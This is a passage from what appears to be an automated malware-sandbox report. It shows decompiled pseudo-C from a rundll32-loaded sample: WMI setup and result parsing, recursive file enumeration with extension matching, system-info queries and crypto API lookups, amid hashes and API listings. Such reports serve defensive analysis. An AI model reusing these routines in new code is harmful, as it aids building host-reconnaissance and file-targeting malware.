                                                                      • Source File: 00000012.00000002.508283820.00000000041B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 041B0000, based on PE: true
                                                                      • Associated: 00000012.00000002.508276267.00000000041B0000.00000004.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000012.00000002.508303853.00000000041CA000.00000002.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000012.00000002.508313561.00000000041CF000.00000004.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000012.00000002.508320405.00000000041D2000.00000002.00001000.00020000.00000000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_18_2_41b0000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: Sleep
                                                                      • String ID:
                                                                      • API String ID: 3472027048-0
                                                                      • Opcode ID: 9864d19caf3000827d114e72d730fb892f31c9cf7f91dc800c66892bc04c38a0
                                                                      • Instruction ID: 3698edc2c5483b4830d9d25802f500ac9c8e17ee8a9235747322be14679ca4d8
                                                                      • Opcode Fuzzy Hash: 9864d19caf3000827d114e72d730fb892f31c9cf7f91dc800c66892bc04c38a0
                                                                      • Instruction Fuzzy Hash: 2E112171608305AFDB14CF55D5C5A99B7E8FF48324F108469E99ADBB40D374F940CB80
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 30%
                                                                      			E041BD213(void* __ecx) {
                                                                      				char _v8;
                                                                      				void* _v12;
                                                                      				char* _t15;
                                                                      				intOrPtr* _t16;
                                                                      				void* _t21;
                                                                      				intOrPtr* _t23;
                                                                      				intOrPtr* _t24;
                                                                      				intOrPtr* _t25;
                                                                      				void* _t30;
                                                                      				void* _t33;
                                                                      
                                                                      				_v12 = 0;
                                                                      				_v8 = 0;
                                                                      				__imp__CoInitializeEx(0, 0, _t30, _t33, __ecx, __ecx);
                                                                      				__imp__CoInitializeSecurity(0, 0xffffffff, 0, 0, 0, 3, 0, 0, 0);
                                                                      				_t15 =  &_v12;
                                                                      				__imp__CoCreateInstance(0x41cd848, 0, 1, 0x41cd858, _t15);
                                                                      				if(_t15 < 0) {
                                                                      					L5:
                                                                      					_t23 = _v8;
                                                                      					if(_t23 != 0) {
                                                                      						 *((intOrPtr*)( *_t23 + 8))(_t23);
                                                                      					}
                                                                      					_t24 = _v12;
                                                                      					if(_t24 != 0) {
                                                                      						 *((intOrPtr*)( *_t24 + 8))(_t24);
                                                                      					}
                                                                      					_t16 = 0;
                                                                      				} else {
                                                                      					__imp__#2(__ecx);
                                                                      					_t25 = _v12;
                                                                      					_t21 =  *((intOrPtr*)( *_t25 + 0xc))(_t25, _t15, 0, 0, 0, 0, 0, 0,  &_v8);
                                                                      					if(_t21 < 0) {
                                                                      						goto L5;
                                                                      					} else {
                                                                      						__imp__CoSetProxyBlanket(_v8, 0xa, 0, 0, 3, 3, 0, 0);
                                                                      						if(_t21 < 0) {
                                                                      							goto L5;
                                                                      						} else {
                                                                      							_t16 = E041B911F(8);
                                                                      							if(_t16 == 0) {
                                                                      								goto L5;
                                                                      							} else {
                                                                      								 *((intOrPtr*)(_t16 + 4)) = _v12;
                                                                      								 *_t16 = _v8;
                                                                      							}
                                                                      						}
                                                                      					}
                                                                      				}
                                                                      				return _t16;
                                                                      			}














                                                                      APIs
                                                                      • CoInitializeEx.OLE32(00000000,00000000,00000000,00000000,00000000,00000000,?,041BD3CE,00000EFA,00000000,00000000,00000005), ref: 041BD226
                                                                      • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000,?,041BD3CE,00000EFA,00000000,00000000,00000005), ref: 041BD237
                                                                      • CoCreateInstance.OLE32(041CD848,00000000,00000001,041CD858,00000000,?,041BD3CE,00000EFA,00000000,00000000,00000005), ref: 041BD24E
                                                                      • SysAllocString.OLEAUT32(00000000), ref: 041BD259
                                                                      • CoSetProxyBlanket.OLE32(00000005,0000000A,00000000,00000000,00000003,00000003,00000000,00000000,?,041BD3CE,00000EFA,00000000,00000000,00000005), ref: 041BD284
                                                                      Memory Dump Source
                                                                      • Source File: 00000012.00000002.508283820.00000000041B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 041B0000, based on PE: true
                                                                      • Associated: 00000012.00000002.508276267.00000000041B0000.00000004.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000012.00000002.508303853.00000000041CA000.00000002.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000012.00000002.508313561.00000000041CF000.00000004.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000012.00000002.508320405.00000000041D2000.00000002.00001000.00020000.00000000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_18_2_41b0000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: Initialize$AllocBlanketCreateInstanceProxySecurityString
                                                                      • String ID:
                                                                      • API String ID: 3531828250-0
                                                                      • Opcode ID: 682021cbe313bcd221ffe4162cf0cba474dfcdd3868c3fd96b9756babfd3696a
                                                                      • Instruction ID: a272cca6b4d1e5bcc38d7c84e962072f130adca12dd39d6fd8b54bee76ce2021
                                                                      • Opcode Fuzzy Hash: 682021cbe313bcd221ffe4162cf0cba474dfcdd3868c3fd96b9756babfd3696a
                                                                      • Instruction Fuzzy Hash: 5621FC70600285BFE7299B97EC8DE9BBF7CEFC6B55F10019CF54196290D770A940CA60
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 78%
                                                                      			E041B9DA8(void* __ecx, void* __fp0, intOrPtr _a16) {
                                                                      				char _v12;
                                                                      				WCHAR* _v16;
                                                                      				struct _WIN32_FIND_DATAW _v608;
                                                                      				WCHAR* _t24;
                                                                      				intOrPtr _t31;
                                                                      				intOrPtr _t41;
                                                                      				void* _t45;
                                                                      				intOrPtr _t46;
                                                                      				void* _t48;
                                                                      				intOrPtr _t54;
                                                                      				void* _t59;
                                                                      				char _t60;
                                                                      				void* _t61;
                                                                      				void* _t62;
                                                                      				void* _t63;
                                                                      				void* _t75;
                                                                      
                                                                      				_t75 = __fp0;
                                                                      				_push(0);
                                                                      				_t48 = __ecx;
                                                                      				_push(L"\\*");
                                                                      				_t24 = E041B9924(__ecx);
                                                                      				_t63 = _t62 + 0xc;
                                                                      				_v16 = _t24;
                                                                      				if(_t24 == 0) {
                                                                      					return _t24;
                                                                      				}
                                                                      				_t59 = FindFirstFileW(_t24,  &_v608);
                                                                      				if(_t59 == 0xffffffff) {
                                                                      					L14:
                                                                      					return E041B913B( &_v16, 0xfffffffe);
                                                                      				} else {
                                                                      					goto L2;
                                                                      				}
                                                                      				do {
                                                                      					L2:
                                                                      					if(E041B9D80( &(_v608.cFileName)) != 0) {
                                                                      						goto L12;
                                                                      					}
                                                                      					if((_v608.dwFileAttributes & 0x00000010) != 0) {
                                                                      						L10:
                                                                      						_push(0);
                                                                      						_push( &(_v608.cFileName));
                                                                      						_push("\\");
                                                                      						_t60 = E041B9924(_t48);
                                                                      						_t63 = _t63 + 0x10;
                                                                      						_v12 = _t60;
                                                                      						if(_t60 != 0) {
                                                                      							_t54 =  *0x41d0fa0; // 0x439f8a0
                                                                      							 *((intOrPtr*)(_t54 + 0xc4))(1);
                                                                      							_push(1);
                                                                      							_push(1);
                                                                      							_push(0);
                                                                      							E041B9DA8(_t60, _t75, 1, 5, E041C0A46, _a16);
                                                                      							_t63 = _t63 + 0x1c;
                                                                      							E041B913B( &_v12, 0xfffffffe);
                                                                      						}
                                                                      						goto L12;
                                                                      					}
                                                                      					_t61 = 0;
                                                                      					do {
                                                                      						_push( *((intOrPtr*)(_t61 + 0x41d10cc)));
                                                                      						_push( &(_v608.cFileName));
                                                                      						_t41 =  *0x41d0fe0; // 0x439fbe0
                                                                      						if( *((intOrPtr*)(_t41 + 0x18))() == 0) {
                                                                      							goto L8;
                                                                      						}
                                                                      						_t45 = E041C0A46(_t75, _t48,  &_v608, _a16);
                                                                      						_t63 = _t63 + 0xc;
                                                                      						if(_t45 == 0) {
                                                                      							break;
                                                                      						}
                                                                      						_t46 =  *0x41d0fa0; // 0x439f8a0
                                                                      						 *((intOrPtr*)(_t46 + 0xc4))(1);
                                                                      						L8:
                                                                      						_t61 = _t61 + 4;
                                                                      					} while (_t61 < 4);
                                                                      					if((_v608.dwFileAttributes & 0x00000010) == 0) {
                                                                      						goto L12;
                                                                      					}
                                                                      					goto L10;
                                                                      					L12:
                                                                      				} while (FindNextFileW(_t59,  &_v608) != 0);
                                                                      				_t31 =  *0x41d0fa0; // 0x439f8a0
                                                                      				 *((intOrPtr*)(_t31 + 0x84))(_t59);
                                                                      				goto L14;
                                                                      			}




















                                                                      APIs
                                                                      • FindFirstFileW.KERNEL32(00000000,?,?,00000000,00000000), ref: 041B9DD9
                                                                      • FindNextFileW.KERNEL32(00000000,?), ref: 041B9EBC
                                                                      Memory Dump Source
                                                                      • Source File: 00000012.00000002.508283820.00000000041B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 041B0000, based on PE: true
                                                                      • Associated: 00000012.00000002.508276267.00000000041B0000.00000004.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000012.00000002.508303853.00000000041CA000.00000002.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000012.00000002.508313561.00000000041CF000.00000004.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000012.00000002.508320405.00000000041D2000.00000002.00001000.00020000.00000000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_18_2_41b0000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: FileFind$FirstNext
                                                                      • String ID:
                                                                      • API String ID: 1690352074-0
                                                                      • Opcode ID: 164897eb4669eca5b40740860906a1c7f91570001fad81b98410601a34e709c6
                                                                      • Instruction ID: 0e75d028bc1d4252f923ee83915a5500db84b0fe26d7ede5a2f4fc2843ac2532
                                                                      • Opcode Fuzzy Hash: 164897eb4669eca5b40740860906a1c7f91570001fad81b98410601a34e709c6
                                                                      • Instruction Fuzzy Hash: 0331E5B1B102156FEB209BA5DCC9FEF37A8EB44754F1400A4FA48A61C0F775B942CBA0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,041B1CDE,?,?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 041BC2DE
                                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 041BC2FE
                                                                      Memory Dump Source
                                                                      • Source File: 00000012.00000002.508283820.00000000041B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 041B0000, based on PE: true
                                                                      • Associated: 00000012.00000002.508276267.00000000041B0000.00000004.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000012.00000002.508303853.00000000041CA000.00000002.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000012.00000002.508313561.00000000041CF000.00000004.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000012.00000002.508320405.00000000041D2000.00000002.00001000.00020000.00000000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_18_2_41b0000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: Time$FileSystemUnothrow_t@std@@@__ehfuncinfo$??2@
                                                                      • String ID:
                                                                      • API String ID: 1518329722-0
                                                                      • Opcode ID: 9f701d86488ffaf8c03d493c1b4ef027ec39a9d828071f885d7f8a138d2bb611
                                                                      • Instruction ID: 03a27191c091a645d12b72a85b157d7f77edf1623cb7b532dd6dc745460d372e
                                                                      • Opcode Fuzzy Hash: 9f701d86488ffaf8c03d493c1b4ef027ec39a9d828071f885d7f8a138d2bb611
                                                                      • Instruction Fuzzy Hash: F4E0DFB6800318AFD720AF68DE45B9ABBBCEB80B04F004558AC81B3304E270BE0886D0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 100%
                                                                      			E041BB883(void* __ecx) {
                                                                      				struct _SYSTEM_INFO _v40;
                                                                      				void* _t5;
                                                                      
                                                                      				if(__ecx == 0) {
                                                                      					GetSystemInfo( &_v40);
                                                                      					return _v40.dwOemId & 0x0000ffff;
                                                                      				} else {
                                                                      					_t5 = 9;
                                                                      					return _t5;
                                                                      				}
                                                                      			}






                                                                      APIs
                                                                      • GetSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,041BBD6E,?,?,00000000), ref: 041BB896
                                                                      Memory Dump Source
                                                                      • Source File: 00000012.00000002.508283820.00000000041B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 041B0000, based on PE: true
                                                                      • Associated: 00000012.00000002.508276267.00000000041B0000.00000004.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000012.00000002.508303853.00000000041CA000.00000002.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000012.00000002.508313561.00000000041CF000.00000004.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000012.00000002.508320405.00000000041D2000.00000002.00001000.00020000.00000000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_18_2_41b0000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: InfoSystem
                                                                      • String ID:
                                                                      • API String ID: 31276548-0
                                                                      • Opcode ID: a1d616a6dee9618e31e61a9391f0ee370ecf211b48b01b0d86f7bb61cff7faaa
                                                                      • Instruction ID: 0649f2262d2027e7d1963857e417c85e574f608a5750c9ef9b682617c6c08da0
                                                                      • Opcode Fuzzy Hash: a1d616a6dee9618e31e61a9391f0ee370ecf211b48b01b0d86f7bb61cff7faaa
                                                                      • Instruction Fuzzy Hash: 40C0223160020D06CF009BA2B6066EA32E84B04248F1000A0E982F0480E654ED8042A0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 50%
                                                                      			E041BD6E7(intOrPtr __ecx, intOrPtr __edx, void* __eflags, intOrPtr _a4) {
                                                                      				signed int _v12;
                                                                      				signed int _v16;
                                                                      				signed int _v20;
                                                                      				char _v24;
                                                                      				void* _v28;
                                                                      				signed int _v32;
                                                                      				char _v36;
                                                                      				intOrPtr _v40;
                                                                      				signed int _v44;
                                                                      				char _v48;
                                                                      				char _v52;
                                                                      				intOrPtr _v56;
                                                                      				signed int _v60;
                                                                      				char* _v72;
                                                                      				signed short _v80;
                                                                      				signed int _v84;
                                                                      				char _v88;
                                                                      				char _v92;
                                                                      				char _v96;
                                                                      				intOrPtr _v100;
                                                                      				char _v104;
                                                                      				char _v616;
                                                                      				intOrPtr* _t159;
                                                                      				char _t165;
                                                                      				signed int _t166;
                                                                      				signed int _t173;
                                                                      				signed int _t178;
                                                                      				signed int _t186;
                                                                      				intOrPtr* _t187;
                                                                      				signed int _t188;
                                                                      				signed int _t192;
                                                                      				intOrPtr* _t193;
                                                                      				intOrPtr _t200;
                                                                      				intOrPtr* _t205;
                                                                      				signed int _t207;
                                                                      				signed int _t209;
                                                                      				intOrPtr* _t210;
                                                                      				intOrPtr _t212;
                                                                      				intOrPtr* _t213;
                                                                      				signed int _t214;
                                                                      				char _t217;
                                                                      				signed int _t218;
                                                                      				signed int _t219;
                                                                      				signed int _t230;
                                                                      				signed int _t235;
                                                                      				signed int _t242;
                                                                      				signed int _t243;
                                                                      				signed int _t244;
                                                                      				signed int _t245;
                                                                      				intOrPtr* _t247;
                                                                      				intOrPtr* _t251;
                                                                      				signed int _t252;
                                                                      				intOrPtr* _t253;
                                                                      				void* _t255;
                                                                      				intOrPtr* _t261;
                                                                      				signed int _t262;
                                                                      				signed int _t283;
                                                                      				signed int _t289;
                                                                      				char* _t298;
                                                                      				void* _t320;
                                                                      				signed int _t322;
                                                                      				intOrPtr* _t323;
                                                                      				intOrPtr _t324;
                                                                      				signed int _t327;
                                                                      				intOrPtr* _t328;
                                                                      				intOrPtr* _t329;
                                                                      
                                                                      				_v32 = _v32 & 0x00000000;
                                                                      				_v60 = _v60 & 0x00000000;
                                                                      				_v56 = __edx;
                                                                      				_v100 = __ecx;
                                                                      				_t159 = E041BD213(__ecx);
                                                                      				_t251 = _t159;
                                                                      				_v104 = _t251;
                                                                      				if(_t251 == 0) {
                                                                      					return _t159;
                                                                      				}
                                                                      				_t320 = E041B911F(0x10);
                                                                      				_v36 = _t320;
                                                                      				_pop(_t255);
                                                                      				if(_t320 == 0) {
                                                                      					L53:
                                                                      					E041B913B( &_v60, 0xfffffffe);
                                                                      					E041BD2C7( &_v104);
                                                                      					return _t320;
                                                                      				}
                                                                      				_t165 = E041B90EA(_t255, 0x101c);
                                                                      				 *_t328 = 0xa18;
                                                                      				_v52 = _t165;
                                                                      				_t166 = E041B90EA(_t255);
                                                                      				_push(0);
                                                                      				_push(_v56);
                                                                      				_v20 = _t166;
                                                                      				_push(_t166);
                                                                      				_push(_a4);
                                                                      				_t322 = E041B9924(_t165);
                                                                      				_v60 = _t322;
                                                                      				E041B9D66( &_v52);
                                                                      				E041B9D66( &_v20);
                                                                      				_t329 = _t328 + 0x20;
                                                                      				if(_t322 != 0) {
                                                                      					_t323 = __imp__#2;
                                                                      					_v40 =  *_t323(_t322);
                                                                      					_t173 = E041B90EA(_t255, 0x10b4);
                                                                      					_v20 = _t173;
                                                                      					_v52 =  *_t323(_t173);
                                                                      					E041B9D66( &_v20);
                                                                      					_t324 = _v40;
                                                                      					_t261 =  *_t251;
                                                                      					_t252 = 0;
                                                                      					_t178 =  *((intOrPtr*)( *_t261 + 0x50))(_t261, _v52, _t324, 0, 0,  &_v32);
                                                                      					__eflags = _t178;
                                                                      					if(_t178 != 0) {
                                                                      						L52:
                                                                      						__imp__#6(_t324);
                                                                      						__imp__#6(_v52);
                                                                      						goto L53;
                                                                      					}
                                                                      					_t262 = _v32;
                                                                      					_v28 = 0;
                                                                      					_v20 = 0;
                                                                      					__eflags = _t262;
                                                                      					if(_t262 == 0) {
                                                                      						L49:
                                                                      						 *((intOrPtr*)( *_t262 + 8))(_t262);
                                                                      						__eflags = _t252;
                                                                      						if(_t252 == 0) {
                                                                      							E041B913B( &_v36, 0);
                                                                      							_t320 = _v36;
                                                                      						} else {
                                                                      							 *(_t320 + 8) = _t252;
                                                                      							 *_t320 = E041B9787(_v100);
                                                                      							 *((intOrPtr*)(_t320 + 4)) = E041B9787(_v56);
                                                                      						}
                                                                      						goto L52;
                                                                      					} else {
                                                                      						goto L6;
                                                                      					}
                                                                      					while(1) {
                                                                      						L6:
                                                                      						_t186 =  *((intOrPtr*)( *_t262 + 0x10))(_t262, 0xea60, 1,  &_v28,  &_v84);
                                                                      						__eflags = _t186;
                                                                      						if(_t186 != 0) {
                                                                      							break;
                                                                      						}
                                                                      						_v16 = 0;
                                                                      						_v48 = 0;
                                                                      						_v12 = 0;
                                                                      						_v24 = 0;
                                                                      						__eflags = _v84;
                                                                      						if(_v84 == 0) {
                                                                      							break;
                                                                      						}
                                                                      						_t187 = _v28;
                                                                      						_t188 =  *((intOrPtr*)( *_t187 + 0x1c))(_t187, 0, 0x40, 0,  &_v24);
                                                                      						__eflags = _t188;
                                                                      						if(_t188 >= 0) {
                                                                      							__imp__#20(_v24, 1,  &_v16);
                                                                      							__imp__#19(_v24, 1,  &_v48);
                                                                      							_t46 = _t320 + 0xc; // 0xc
                                                                      							_t253 = _t46;
                                                                      							_t327 = _t252 << 3;
                                                                      							_t47 = _t327 + 8; // 0x8
                                                                      							_t192 = E041B91B9(_t327, _t47);
                                                                      							__eflags = _t192;
                                                                      							if(_t192 == 0) {
                                                                      								__imp__#16(_v24);
                                                                      								_t193 = _v28;
                                                                      								 *((intOrPtr*)( *_t193 + 8))(_t193);
                                                                      								L46:
                                                                      								_t252 = _v20;
                                                                      								break;
                                                                      							}
                                                                      							 *(_t327 +  *_t253) = _v48 - _v16 + 1;
                                                                      							 *((intOrPtr*)(_t327 +  *_t253 + 4)) = E041B911F( *(_t327 +  *_t253) << 3);
                                                                      							_t200 =  *_t253;
                                                                      							__eflags =  *(_t327 + _t200 + 4);
                                                                      							if( *(_t327 + _t200 + 4) == 0) {
                                                                      								_t136 = _t320 + 0xc; // 0xc
                                                                      								E041B913B(_t136, 0);
                                                                      								E041B913B( &_v36, 0);
                                                                      								__imp__#16(_v24);
                                                                      								_t205 = _v28;
                                                                      								 *((intOrPtr*)( *_t205 + 8))(_t205);
                                                                      								_t320 = _v36;
                                                                      								goto L46;
                                                                      							}
                                                                      							_t207 = _v16;
                                                                      							while(1) {
                                                                      								_v12 = _t207;
                                                                      								__eflags = _t207 - _v48;
                                                                      								if(_t207 > _v48) {
                                                                      									break;
                                                                      								}
                                                                      								_v44 = _v44 & 0x00000000;
                                                                      								_t209 =  &_v12;
                                                                      								__imp__#25(_v24, _t209,  &_v44);
                                                                      								__eflags = _t209;
                                                                      								if(_t209 < 0) {
                                                                      									break;
                                                                      								}
                                                                      								_t212 = E041B9787(_v44);
                                                                      								 *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + (_v12 - _v16) * 8)) = _t212;
                                                                      								_t213 = _v28;
                                                                      								_t281 =  *_t213;
                                                                      								_t214 =  *((intOrPtr*)( *_t213 + 0x10))(_t213, _v44, 0,  &_v80, 0, 0);
                                                                      								__eflags = _t214;
                                                                      								if(_t214 < 0) {
                                                                      									L39:
                                                                      									__imp__#6(_v44);
                                                                      									_t207 = _v12 + 1;
                                                                      									__eflags = _t207;
                                                                      									continue;
                                                                      								}
                                                                      								_v92 = E041B90EA(_t281, 0xe23);
                                                                      								 *_t329 = 0x375;
                                                                      								_t217 = E041B90EA(_t281);
                                                                      								_t283 = _v80;
                                                                      								_v96 = _t217;
                                                                      								_t218 = _t283 & 0x0000ffff;
                                                                      								__eflags = _t218 - 0xb;
                                                                      								if(__eflags > 0) {
                                                                      									_t219 = _t218 - 0x10;
                                                                      									__eflags = _t219;
                                                                      									if(_t219 == 0) {
                                                                      										L35:
                                                                      										 *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8)) = E041B911F(0x18);
                                                                      										_t289 =  *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8));
                                                                      										__eflags = _t289;
                                                                      										if(_t289 == 0) {
                                                                      											L38:
                                                                      											E041B9D66( &_v92);
                                                                      											E041B9D66( &_v96);
                                                                      											__imp__#9( &_v80);
                                                                      											goto L39;
                                                                      										}
                                                                      										_push(_v72);
                                                                      										_push(L"%d");
                                                                      										L37:
                                                                      										_push(0xc);
                                                                      										_push(_t289);
                                                                      										E041BC08E();
                                                                      										_t329 = _t329 + 0x10;
                                                                      										goto L38;
                                                                      									}
                                                                      									_t230 = _t219 - 1;
                                                                      									__eflags = _t230;
                                                                      									if(_t230 == 0) {
                                                                      										L33:
                                                                      										 *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8)) = E041B911F(0x18);
                                                                      										_t289 =  *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8));
                                                                      										__eflags = _t289;
                                                                      										if(_t289 == 0) {
                                                                      											goto L38;
                                                                      										}
                                                                      										_push(_v72);
                                                                      										_push(L"%u");
                                                                      										goto L37;
                                                                      									}
                                                                      									_t235 = _t230 - 1;
                                                                      									__eflags = _t235;
                                                                      									if(_t235 == 0) {
                                                                      										goto L33;
                                                                      									}
                                                                      									__eflags = _t235 == 1;
                                                                      									if(_t235 == 1) {
                                                                      										goto L33;
                                                                      									}
                                                                      									L28:
                                                                      									__eflags = _t283 & 0x00002000;
                                                                      									if((_t283 & 0x00002000) == 0) {
                                                                      										_v88 = E041B90EA(_t283, 0xedb);
                                                                      										E041BC08E( &_v616, 0x100, _t237, _v80 & 0x0000ffff);
                                                                      										E041B9D66( &_v88);
                                                                      										_t329 = _t329 + 0x18;
                                                                      										_t298 =  &_v616;
                                                                      										L31:
                                                                      										_t242 = E041B9787(_t298);
                                                                      										L32:
                                                                      										 *( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8) = _t242;
                                                                      										goto L38;
                                                                      									}
                                                                      									_t242 = E041BD5CB( &_v80);
                                                                      									goto L32;
                                                                      								}
                                                                      								if(__eflags == 0) {
                                                                      									__eflags = _v72 - 0xffff;
                                                                      									_t298 = L"TRUE";
                                                                      									if(_v72 != 0xffff) {
                                                                      										_t298 = L"FALSE";
                                                                      									}
                                                                      									goto L31;
                                                                      								}
                                                                      								_t243 = _t218 - 1;
                                                                      								__eflags = _t243;
                                                                      								if(_t243 == 0) {
                                                                      									goto L38;
                                                                      								}
                                                                      								_t244 = _t243 - 1;
                                                                      								__eflags = _t244;
                                                                      								if(_t244 == 0) {
                                                                      									goto L35;
                                                                      								}
                                                                      								_t245 = _t244 - 1;
                                                                      								__eflags = _t245;
                                                                      								if(_t245 == 0) {
                                                                      									goto L35;
                                                                      								}
                                                                      								__eflags = _t245 != 5;
                                                                      								if(_t245 != 5) {
                                                                      									goto L28;
                                                                      								}
                                                                      								_t298 = _v72;
                                                                      								goto L31;
                                                                      							}
                                                                      							__imp__#16(_v24);
                                                                      							_t210 = _v28;
                                                                      							 *((intOrPtr*)( *_t210 + 8))(_t210);
                                                                      							_t252 = _v20;
                                                                      							L42:
                                                                      							_t262 = _v32;
                                                                      							_t252 = _t252 + 1;
                                                                      							_v20 = _t252;
                                                                      							__eflags = _t262;
                                                                      							if(_t262 != 0) {
                                                                      								continue;
                                                                      							}
                                                                      							L48:
                                                                      							_t324 = _v40;
                                                                      							goto L49;
                                                                      						}
                                                                      						_t247 = _v28;
                                                                      						 *((intOrPtr*)( *_t247 + 8))(_t247);
                                                                      						goto L42;
                                                                      					}
                                                                      					_t262 = _v32;
                                                                      					goto L48;
                                                                      				} else {
                                                                      					E041B913B( &_v36, _t322);
                                                                      					_t320 = _v36;
                                                                      					goto L53;
                                                                      				}
                                                                      			}

                                                                      APIs
                                                                        • Part of subcall function 041BD213: CoInitializeEx.OLE32(00000000,00000000,00000000,00000000,00000000,00000000,?,041BD3CE,00000EFA,00000000,00000000,00000005), ref: 041BD226
                                                                        • Part of subcall function 041BD213: CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000,?,041BD3CE,00000EFA,00000000,00000000,00000005), ref: 041BD237
                                                                        • Part of subcall function 041BD213: CoCreateInstance.OLE32(041CD848,00000000,00000001,041CD858,00000000,?,041BD3CE,00000EFA,00000000,00000000,00000005), ref: 041BD24E
                                                                        • Part of subcall function 041BD213: SysAllocString.OLEAUT32(00000000), ref: 041BD259
                                                                        • Part of subcall function 041BD213: CoSetProxyBlanket.OLE32(00000005,0000000A,00000000,00000000,00000003,00000003,00000000,00000000,?,041BD3CE,00000EFA,00000000,00000000,00000005), ref: 041BD284
                                                                      • SysAllocString.OLEAUT32(00000000), ref: 041BD790
                                                                      • SysAllocString.OLEAUT32(00000000), ref: 041BD7A4
                                                                      • SysFreeString.OLEAUT32(?), ref: 041BDB2D
                                                                      • SysFreeString.OLEAUT32(?), ref: 041BDB36
                                                                        • Part of subcall function 041B913B: HeapFree.KERNEL32(00000000,00000000), ref: 041B9181
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000012.00000002.508283820.00000000041B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 041B0000, based on PE: true
                                                                      • Associated: 00000012.00000002.508276267.00000000041B0000.00000004.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000012.00000002.508303853.00000000041CA000.00000002.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000012.00000002.508313561.00000000041CF000.00000004.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000012.00000002.508320405.00000000041D2000.00000002.00001000.00020000.00000000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_18_2_41b0000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: String$AllocFree$Initialize$BlanketCreateHeapInstanceProxySecurity
                                                                      • String ID: FALSE$TRUE
                                                                      • API String ID: 318989454-1412513891
                                                                      • Opcode ID: dabdf13d4a54229ca20cdabf5ba8a3649b8a144c6b2078743851953de98bca5f
                                                                      • Instruction ID: a4219c36d1c7e13b9b5a105cd120524ea16933667623fe32fcbbfac0ea0871f7
                                                                      • Opcode Fuzzy Hash: dabdf13d4a54229ca20cdabf5ba8a3649b8a144c6b2078743851953de98bca5f
                                                                      • Instruction Fuzzy Hash: 4EE14CB5E00219AFDB18DFA4D8D4EEEBBB9FF49314F104059E645A7280DB35B942CB90
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 30%
                                                                      			E041C3175(intOrPtr* _a4) {
                                                                      				signed int _v8;
                                                                      				_Unknown_base(*)()* _v12;
                                                                      				char _v16;
                                                                      				_Unknown_base(*)()* _t15;
                                                                      				void* _t20;
                                                                      				intOrPtr* _t25;
                                                                      				intOrPtr* _t29;
                                                                      				struct HINSTANCE__* _t30;
                                                                      
                                                                      				_v8 = _v8 & 0x00000000;
                                                                      				_t30 = GetModuleHandleW(L"advapi32.dll");
                                                                      				if(_t30 == 0) {
                                                                      					L7:
                                                                      					return 1;
                                                                      				}
                                                                      				_t25 = GetProcAddress(_t30, "CryptAcquireContextA");
                                                                      				if(_t25 == 0) {
                                                                      					goto L7;
                                                                      				}
                                                                      				_t15 = GetProcAddress(_t30, "CryptGenRandom");
                                                                      				_v12 = _t15;
                                                                      				if(_t15 == 0) {
                                                                      					goto L7;
                                                                      				}
                                                                      				_t29 = GetProcAddress(_t30, "CryptReleaseContext");
                                                                      				if(_t29 == 0) {
                                                                      					goto L7;
                                                                      				}
